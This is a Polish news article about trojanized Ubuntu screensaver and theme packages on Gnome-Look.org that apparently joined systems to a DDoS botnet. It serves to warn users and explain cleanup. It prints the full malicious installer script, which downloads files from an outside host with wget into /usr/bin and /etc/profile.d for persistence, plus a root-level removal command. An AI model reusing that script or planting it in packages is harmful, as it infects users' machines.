Szkodliwy kod czaił się w instalatorach wygaszacza ekranu Waterfall ScreenSaver oraz motywu Ninja Black - poinformował w serwisie Niebezpiecznik.pl konsultant ds. bezpieczeństwa Piotr Konieczny. Skrypt umożliwiający przyłączenie zaatakowanego systemu do botnetu miał następującą postać:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Złośliwe oprogramowanie najprawdopodobniej zmuszało zaatakowane Ubuntu do „pomocy” w przeprowadzaniu ataków DDoS - uważa Konieczny.

Warto podkreślić, że podany wyżej kod nie wykorzystywał żadnej luki w Ubuntu. Aby doszło do infekcji, użytkownik podczas instalacji pakietu .deb musiał podać hasło roota. Jak zauważa jednak Adrian Nowak prowadzący serwis UbuCentrum.net, ciągłe wpisywanie hasła z czasem zwyczajnie wchodzi nam w krew i przy setnej czy tysięcznej prośbie o jego podanie naturalnym jest, że nie zastanawiamy się nad konsekwencjami. Dlatego m.in. warto pamiętać o pobieraniu dodatków wyłącznie ze sprawdzonych źródeł.

Co zrobić, jeśli się zainstalowało któryś z wymienionych wcześniej pakietów z serwisu Gnome-Look.org? Specjaliści doradzają wpisanie w terminalu następującego polecenia:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

Uwaga! Nie należy tego robić „na wszelki wypadek”.

>> Czytaj także: Szkodniki atakujące systemy inne niż Windows